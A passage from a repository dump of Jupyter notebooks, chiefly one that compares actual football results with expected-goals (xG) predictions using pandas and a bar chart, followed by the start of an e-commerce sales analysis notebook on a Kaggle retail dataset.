354 | "source": [ 355 | "xg_conditions = [\n", 356 | " (data['xg1'].round(0) > data['xg2'].round(0)),\n", 357 | " (data['xg1'].round(0) == data['xg2'].round(0)),\n", 358 | " (data['xg1'].round(0) < data['xg2'].round(0))\n", 359 | "]\n", 360 | "xg_values = ['1', 'X', '2'] # home_win, draw, away_win\n", 361 | "data['xg_result'] = np.select(xg_conditions, xg_values)" 362 | ] 363 | }, 364 | { 365 | "cell_type": "markdown", 366 | "metadata": {}, 367 | "source": [ 368 | "We take a look at our data and we already see that results do not match in 4 cases out of 5. But this selection isn't representative, we have to check out at all the games." 369 | ] 370 | }, 371 | { 372 | "cell_type": "code", 373 | "execution_count": 22, 374 | "metadata": {}, 375 | "outputs": [ 376 | { 377 | "data": { 378 | "text/html": [ 379 | "
\n", 380 | "\n", 393 | "\n", 394 | " \n", 395 | " \n", 396 | " \n", 397 | " \n", 398 | " \n", 399 | " \n", 400 | " \n", 401 | " \n", 402 | " \n", 403 | " \n", 404 | " \n", 405 | " \n", 406 | " \n", 407 | " \n", 408 | " \n", 409 | " \n", 410 | " \n", 411 | " \n", 412 | " \n", 413 | " \n", 414 | " \n", 415 | " \n", 416 | " \n", 417 | " \n", 418 | " \n", 419 | " \n", 420 | " \n", 421 | " \n", 422 | " \n", 423 | " \n", 424 | " \n", 425 | " \n", 426 | " \n", 427 | " \n", 428 | " \n", 429 | " \n", 430 | " \n", 431 | " \n", 432 | " \n", 433 | " \n", 434 | " \n", 435 | " \n", 436 | " \n", 437 | " \n", 438 | " \n", 439 | " \n", 440 | " \n", 441 | " \n", 442 | " \n", 443 | " \n", 444 | " \n", 445 | " \n", 446 | " \n", 447 | " \n", 448 | " \n", 449 | " \n", 450 | " \n", 451 | " \n", 452 | " \n", 453 | " \n", 454 | " \n", 455 | " \n", 456 | " \n", 457 | " \n", 458 | " \n", 459 | " \n", 460 | " \n", 461 | " \n", 462 | " \n", 463 | " \n", 464 | " \n", 465 | " \n", 466 | " \n", 467 | " \n", 468 | " \n", 469 | " \n", 470 | " \n", 471 | " \n", 472 | " \n", 473 | " \n", 474 | " \n", 475 | " \n", 476 | " \n", 477 | " \n", 478 | " \n", 479 | " \n", 480 | " \n", 481 | " \n", 482 | "
seasondateleagueteam1team2score1score2xg1xg2resultxg_result
1020162016-08-12French Ligue 1BastiaParis Saint-Germain0.01.00.970.632X
1120162016-08-12French Ligue 1AS MonacoGuingamp2.02.02.450.77X1
1220162016-08-13Barclays Premier LeagueHull CityLeicester City2.01.00.852.7712
1320162016-08-13Barclays Premier LeagueEvertonTottenham Hotspur1.01.00.731.11XX
1420162016-08-13Barclays Premier LeagueCrystal PalaceWest Bromwich Albion0.01.01.110.682X
\n", 483 | "
" 484 | ], 485 | "text/plain": [ 486 | " season date league team1 \\\n", 487 | "10 2016 2016-08-12 French Ligue 1 Bastia \n", 488 | "11 2016 2016-08-12 French Ligue 1 AS Monaco \n", 489 | "12 2016 2016-08-13 Barclays Premier League Hull City \n", 490 | "13 2016 2016-08-13 Barclays Premier League Everton \n", 491 | "14 2016 2016-08-13 Barclays Premier League Crystal Palace \n", 492 | "\n", 493 | " team2 score1 score2 xg1 xg2 result xg_result \n", 494 | "10 Paris Saint-Germain 0.0 1.0 0.97 0.63 2 X \n", 495 | "11 Guingamp 2.0 2.0 2.45 0.77 X 1 \n", 496 | "12 Leicester City 2.0 1.0 0.85 2.77 1 2 \n", 497 | "13 Tottenham Hotspur 1.0 1.0 0.73 1.11 X X \n", 498 | "14 West Bromwich Albion 0.0 1.0 1.11 0.68 2 X " 499 | ] 500 | }, 501 | "execution_count": 22, 502 | "metadata": {}, 503 | "output_type": "execute_result" 504 | } 505 | ], 506 | "source": [ 507 | "data.head()" 508 | ] 509 | }, 510 | { 511 | "cell_type": "markdown", 512 | "metadata": {}, 513 | "source": [ 514 | "If we go directly and ask a question \"How many games ended with the actual result distinct from the xG (expected) one?\", we find that this number is quite big - 14310 out of 29659" 515 | ] 516 | }, 517 | { 518 | "cell_type": "code", 519 | "execution_count": 26, 520 | "metadata": {}, 521 | "outputs": [ 522 | { 523 | "data": { 524 | "text/plain": [ 525 | "14310" 526 | ] 527 | }, 528 | "execution_count": 26, 529 | "metadata": {}, 530 | "output_type": "execute_result" 531 | } 532 | ], 533 | "source": [ 534 | "data[data['xg_result'] != data['result']].count()[0]" 535 | ] 536 | }, 537 | { 538 | "cell_type": "markdown", 539 | "metadata": {}, 540 | "source": [ 541 | "Or we can say that 48.25% of the games do not end up the same as it should (according to xG metric)" 542 | ] 543 | }, 544 | { 545 | "cell_type": "code", 546 | "execution_count": 31, 547 | "metadata": {}, 548 | "outputs": [ 549 | { 550 | "data": { 551 | "text/plain": [ 552 | "'48.25%'" 553 | ] 554 | }, 555 | "execution_count": 31, 556 | "metadata": {}, 557 | "output_type": "execute_result" 558 | } 559 | ], 560 | "source": [ 561 | "f\"{data[data['xg_result'] != data['result']].count()[0]/data.count()[0]*100:.2f}%\"" 562 | ] 563 | }, 564 | { 565 | "cell_type": "markdown", 566 | "metadata": {}, 567 | "source": [ 568 | "That seems quite unfair. But as we know there are 3 different outcomes in each football game: victory, draw and defeat. So let's compare how many times teams won and should have won, drew and should have drawn, lost and should have lost.\n", 569 | "\n", 570 | "To do this we will create an abstract dataset of results and xg_results and see how these two sets of values differ." 
571 | ] 572 | }, 573 | { 574 | "cell_type": "code", 575 | "execution_count": 32, 576 | "metadata": {}, 577 | "outputs": [], 578 | "source": [ 579 | "results = data[['result', 'xg_result']]" 580 | ] 581 | }, 582 | { 583 | "cell_type": "code", 584 | "execution_count": 33, 585 | "metadata": {}, 586 | "outputs": [ 587 | { 588 | "data": { 589 | "text/plain": [ 590 | "1 12755\n", 591 | "X 9847\n", 592 | "2 7057\n", 593 | "Name: xg_result, dtype: int64" 594 | ] 595 | }, 596 | "execution_count": 33, 597 | "metadata": {}, 598 | "output_type": "execute_result" 599 | } 600 | ], 601 | "source": [ 602 | "results['xg_result'].value_counts()" 603 | ] 604 | }, 605 | { 606 | "cell_type": "code", 607 | "execution_count": 34, 608 | "metadata": {}, 609 | "outputs": [ 610 | { 611 | "data": { 612 | "text/plain": [ 613 | "1 13289\n", 614 | "2 8784\n", 615 | "X 7586\n", 616 | "Name: result, dtype: int64" 617 | ] 618 | }, 619 | "execution_count": 34, 620 | "metadata": {}, 621 | "output_type": "execute_result" 622 | } 623 | ], 624 | "source": [ 625 | "results['result'].value_counts()" 626 | ] 627 | }, 628 | { 629 | "cell_type": "markdown", 630 | "metadata": {}, 631 | "source": [ 632 | "And now let's put these values in a bar chart next to each other." 633 | ] 634 | }, 635 | { 636 | "cell_type": "code", 637 | "execution_count": 58, 638 | "metadata": {}, 639 | "outputs": [ 640 | { 641 | "data": { 642 | "text/plain": [ 643 | "" 644 | ] 645 | }, 646 | "execution_count": 58, 647 | "metadata": {}, 648 | "output_type": "execute_result" 649 | }, 650 | { 651 | "data": { 652 | "image/png": "iVBORw0KGgoAAAANSUhEUgAAAYMAAAD4CAYAAAAO9oqkAAAAOXRFWHRTb2Z0d2FyZQBNYXRwbG90bGliIHZlcnNpb24zLjUuMiwgaHR0cHM6Ly9tYXRwbG90bGliLm9yZy8qNh9FAAAACXBIWXMAAAsTAAALEwEAmpwYAAAaEklEQVR4nO3de3RU9bn/8fdDEuWqAkZ+Cq4maxUsGAmXILqCaTUVgvIDL0Xwwq2U1ArVSkWg7SqXQg8tKogolAo/8VSCilXxwCmgQNV6AAOlVYkWUJEglRxuEq+EPL8/8k0MMYFkJmSC+bzWymLvZ3/3nmcyms/sy+wxd0dERBq2RrFuQEREYk9hICIiCgMREVEYiIgICgMREQHiY91ApM4991xPSkqKdRsiIqeVzZs3/6+7J1asn7ZhkJSURG5ubqzbEBE5rZjZrsrqOkwkIiIKAxERURiIiAin8TkDEYne0aNHyc/P5/PPP491K1LLGjduTLt27UhISKjWeIWBSAOWn59PixYtSEpKwsxi3Y7UEndn//795Ofnk5ycXK11dJhIpAH7/PPPad26tYLgG8bMaN26dY32+BQGIg2cguCbqaavq8JARER0zkBEvmI2pVa35z6pWuOee+45rr/+evLy8vjOd75zwrGzZ88mOzubpk2bRtTTY489Rm5uLnPnzo1o/Zr63ve+x3333UdaWhq//e1v+cUvflEnj1tTDTIMavs/+FOpuv8ziZzOcnJy6NWrFzk5OUyZcuL/P2fPns1tt90WcRhUR1FREfHxtf/nsT6HgQ4TiUhMFRYW8uqrr7Jw4UKWLl1aVj927Bj33HMPKSkpdO7cmYceeog5c+bw4YcfcuWVV3LllVcC0Lx587J1li1bxvDhwwF44YUX6NmzJ127duX73/8+H3300Qn7mDx5MkOGDCE9PZ0hQ4ZQUFDAjTfeSI8ePejRowd/+9vfAPjrX/9Kly5d6NKlC127duXIkSOsX7+efv36lW1rzJgxPPbYY8dtf8KECXz22Wd06dKFW2+9lU8++YRrr72W1NRUUlJSePLJJ6P5NUatQe4ZiEj98fzzz5OVlUWHDh1o3bo1mzdvpnv37ixYsID333+frVu3Eh8fz4EDB2jVqhUPPPAA69at49xzzz3hdnv16sWGDRswMx599FF+//vfc//9959wnW3btvHqq6/SpEkTbrnlFu6++2569erFBx98QJ8+fcjLy+O+++7j4YcfJj09ncLCQho3blyt5zljxgzmzp3L1q1bAXjmmWe44IILWLFiBQCHDx+u1nZOFYWBiMRUTk4Od911FwCDBw8mJyeH7t278+KLL3L77beXHa5p1apVjbabn5/PoEGD2Lt3L19++WW1rrfv378/TZo0AeDFF19k27ZtZcs+/vhjCgsLSU9PZ+zYsdx6663ccMMNtGvXrkZ9lbrkkkv4+c9/zvjx4+nXrx9XXHFFRNupLQoDEYmZAwcOsHbtWt544w3MjGPHjmFmzJw5s9rbKH8JZfnr6n/6058yduxY+vfvz/r165k8efJJt9WsWbOy6eLiYjZs2PC1d/4TJkzg2muvZeXKlaSnp7Nq1Sri4+MpLi6utI+qdOjQgS1btrBy5Up+9atfkZmZya9//euTrneq6JyBiMTMsmXLGDJkCLt27eL9999n9+7dJCcn88orr3D11Vfzhz/8gaKiIqAkOABatGjBkSNHyrbRpk0b8vLyKC4u5tlnny2rHz58mLZt2wKwePHiGvfWu3dvHnroobL50sM7O3fu5JJLLmH8+PH06NGDt99+m29961ts27aNL774gkOHDvHSSy9Vus2EhASOHj0KwIcffkjTpk257bbbGDduHFu2bKlxj7VJewYiUqaur17Lyclh/Pjxx9VuvPFGcnJyeOihh/jXv/5F586dSUhIYNSoUYwZM4bs7GyysrK44IILWLduHTNmzKBfv34kJiaSlpZGYWEhU
HJCeODAgbRs2ZKrrrqK9957r0a9zZkzh9GjR9O5c2eKiorIyMhg/vz5zJ49m3Xr1tGoUSMuvvhi+vbty5lnnslNN91ESkoKycnJdO3atdJtZmdn07lzZ7p168bQoUMZN24cjRo1IiEhgXnz5kX2S6wl5u4xbSBSaWlpHumX2+jSUpESeXl5dOzYMdZtyClS2etrZpvdPa3iWO0Z1HdLTrNbBdxyer65EGnodM5AREQUBiIiojAQEREUBiIigsJARETQ1UQiUl5tX71WjavL4uLiuOSSS8rmBw8ezIQJE2q3jwoOHTrEkiVLuOOOO2q03uTJk2nevDn33HPPKerseElJSeTm5hIfHx9RvzWhPQMRiakmTZqwdevWsp9THQRQEgaPPPLIKdl26Sema9Op7LeUwkBE6p3Dhw9z0UUX8c477wBw880388c//hEouWX13XffzcUXX0xmZiYFBQVAyW0isrKy6N69O1dccQVvv/02AB999BHXX389qamppKam8tprrzFhwgR27txJly5dGDduHAAzZ86kR48edO7cmUmTvvqw5/Tp0+nQoQO9evUq66ei4cOHc/vtt9OzZ0/uvffeKnt5+umnSUlJITU1lYyMDKDky3bGjBlTtq1+/fqxfv3647Zfsd+9e/eSkZFBly5dSElJ4ZVXXon2V37yw0RmtgjoB+xz95RQmwn8X+BLYCcwwt0PhWUTgZHAMeBOd18V6lnAg0Ac8Ki7zwj1ZGAp0BrYDAxx9y+jfmYicloovcd/qYkTJzJo0CDmzp3L8OHDueuuuzh48CCjRo0C4JNPPiEtLY1Zs2YxdepUpkyZwty5c8nOzmb+/Pm0b9+ejRs3cscdd7B27VruvPNOvvvd7/Lss89y7NgxCgsLmTFjBm+++WbZ/YZWr17N9u3b2bRpE+5O//79efnll2nWrBlLly5l69atFBUV0a1bN7p3717p88jPz+e1114jLi6OzMzMSnuZOnUqq1atom3bthw6dKjav6OK/d5///306dOHX/7ylxw7doxPP/00kl/9capzzuAxYC7weLnaGmCiuxeZ2e+AicB4M+sEDAYuBi4AXjSzDmGdh4GrgXzgdTNb7u7bgN8Bs9x9qZnNpyRIYnuTDhGpM6WHiSq6+uqrefrppxk9ejT/+Mc/yuqNGjVi0KBBANx2223ccMMNFBYW8tprrzFw4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
ASUVORK5CYII=", 653 | "text/plain": [ 654 | "
" 655 | ] 656 | }, 657 | "metadata": { 658 | "needs_background": "light" 659 | }, 660 | "output_type": "display_data" 661 | } 662 | ], 663 | "source": [ 664 | "x = ['1', 'X', '2']\n", 665 | "scores = results['result'].value_counts().values\n", 666 | "xg_scores = results['xg_result'].value_counts().values\n", 667 | " \n", 668 | "X_axis = np.arange(len(x))\n", 669 | " \n", 670 | "plt.bar(X_axis - 0.2, scores, 0.4, label = 'Actual results', color='navy')\n", 671 | "plt.bar(X_axis + 0.2, xg_scores, 0.4, label = 'Expected results', color='orange')\n", 672 | "plt.xticks(np.arange(3), ['1', 'X', '2'])\n", 673 | "plt.legend()\n" 674 | ] 675 | }, 676 | { 677 | "cell_type": "markdown", 678 | "metadata": {}, 679 | "source": [ 680 | "And what we can see visually is that there is no such a huge difference between actual outcomes and expected ones. And if we put this into numbers we get:" 681 | ] 682 | }, 683 | { 684 | "cell_type": "code", 685 | "execution_count": 56, 686 | "metadata": {}, 687 | "outputs": [ 688 | { 689 | "name": "stdout", 690 | "output_type": "stream", 691 | "text": [ 692 | "1: 4.19%\n", 693 | "X: 10.80%\n", 694 | "2: 7.50%\n" 695 | ] 696 | } 697 | ], 698 | "source": [ 699 | "diffs = list(np.divide(scores, xg_scores))\n", 700 | "\n", 701 | "for diff in diffs:\n", 702 | " print(f'{x[diffs.index(diff)]}: {abs(1-diff)*100:.2f}%')" 703 | ] 704 | }, 705 | { 706 | "cell_type": "markdown", 707 | "metadata": {}, 708 | "source": [ 709 | "It means that when we compare the amount of games that ended up in the victory of home team in reality, we can see that this number differs from expected xG_result only in 4.19% of occasions, draws differ in 10.80% of occasions, and victories of away teams - in 7.5%. So, apparently, football IS fair?" 710 | ] 711 | }, 712 | { 713 | "cell_type": "markdown", 714 | "metadata": {}, 715 | "source": [ 716 | "## Conclusion\n", 717 | "\n", 718 | "I will be honest here, I've got a bit confused in the end and not sure if the steps I took are correct. I am not trying to manipulate data consciously, but maybe I am making an error by comparing the datapoints in a wrong way.\n", 719 | "\n", 720 | "Anyway, what my conclusion is the following: we can claim that football is quite fair game as stronger team usually wins against weaker one. 
And even though the actual results of every particular game might not correspond to the expected ones, on the global scale, when we talk big numbers, we can see that the distribution of real outcomes and expected ones are quite similar, therefore the conclusion that football is fair makes sense (taking into account our benchmark of 90% of same outcomes or 10% of different outcomes)" 721 | ] 722 | } 723 | ], 724 | "metadata": { 725 | "kernelspec": { 726 | "display_name": "Python 3.8.10 ('venv': venv)", 727 | "language": "python", 728 | "name": "python3" 729 | }, 730 | "language_info": { 731 | "codemirror_mode": { 732 | "name": "ipython", 733 | "version": 3 734 | }, 735 | "file_extension": ".py", 736 | "mimetype": "text/x-python", 737 | "name": "python", 738 | "nbconvert_exporter": "python", 739 | "pygments_lexer": "ipython3", 740 | "version": "3.8.10" 741 | }, 742 | "orig_nbformat": 4, 743 | "vscode": { 744 | "interpreter": { 745 | "hash": "439571daf87331876600085d8386dc908c3f950474647915ed4fb6541957308b" 746 | } 747 | } 748 | }, 749 | "nbformat": 4, 750 | "nbformat_minor": 2 751 | } 752 | -------------------------------------------------------------------------------- /E-Commerce_ Predicting Sales.ipynb: -------------------------------------------------------------------------------- 1 | {"cells":[{"metadata":{"id":"iInTqLqao6Pj","colab_type":"text"},"cell_type":"markdown","source":"We live in the world of e-commerce. We see tons of different stores here and there through the web. Internet made it possible to trade with anyone and everywhere. We can buy goods without leaving our house, we can compare prices in different stores within seconds, we can find what we really want and do not accept just the first more or less suitable offer. And I believe it would be really interesting to look at this world through the data it produces. That's why I decided to play around with e-commerce numbers and try to understand it better.\n\nThe data used in this analysis is taken from Kaggle dataset [\"E-Commerce Data | Actual transactions of UK retailer\"](https://www.kaggle.com/carrie1/ecommerce-data). \n\nThis is a transnational data set which contains all the transactions occurring between 01/12/2010 and 09/12/2011 for a UK-based and registered non-store online retail.The company mainly sells unique all-occasion gifts. Many customers of the company are wholesalers."},{"metadata":{},"cell_type":"markdown","source":"As always, we start our analysis by setting up our environment and by importing necessary libraries.\n\nWe import standard numpy and pandas to be able to perform analysis with Python, also we need data visualization libraries matplotlib and seaborn to output interesting visual findings, aaaaand some settings to make our kernel prettier."},{"metadata":{"id":"tII5uwykox0s","colab_type":"text"},"cell_type":"markdown","source":"# 1. Import libraries and data"},{"metadata":{"id":"YhbJLUN2an2n","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nplt.style.use('fivethirtyeight')\n%matplotlib inline","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"We import our data using *.read_csv()* method and we also add a parameter \"encoding='latin'\" as default encoding engine wasn't able to process this particular dataset. 
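For reference, a minimal sketch of that fallback pattern — the helper name and the 'data.csv' path are placeholders, and the encodings listed are just common candidates rather than an exhaustive set:

```python
import pandas as pd

def read_csv_with_fallback(path, encodings=('utf-8', 'latin', 'cp1252')):
    """Try a few common encodings until one of them decodes the file."""
    for enc in encodings:
        try:
            return pd.read_csv(path, encoding=enc)
        except UnicodeDecodeError:
            print(f"encoding '{enc}' failed, trying the next one...")
    raise ValueError(f"none of {encodings} could decode {path}")

# df = read_csv_with_fallback('data.csv')  # 'data.csv' is a placeholder path
```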
So next time you have difficulties importing data and everything seems to be correct and OK, check out encoding. That might save you some time of googling to try to understand what's wrong."},{"metadata":{"id":"MeUgjP_ga6z_","colab_type":"code","outputId":"cb557913-8c23-4c87-b116-4cb36d9359f2","colab":{"base_uri":"https://localhost:8080/","height":198},"trusted":true},"cell_type":"code","source":"# for Kaggle\ndf = pd.read_csv('/kaggle/input/ecommerce-data/data.csv', encoding='latin')\n# df = pd.read_csv('data.csv', encoding='latin')\ndf.head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Just by looking at first 5 rows of our table we can understand the structure and datatypes present in our dataset. We can notice that we will have to deal with timeseries data, integers and floats, categorical and text 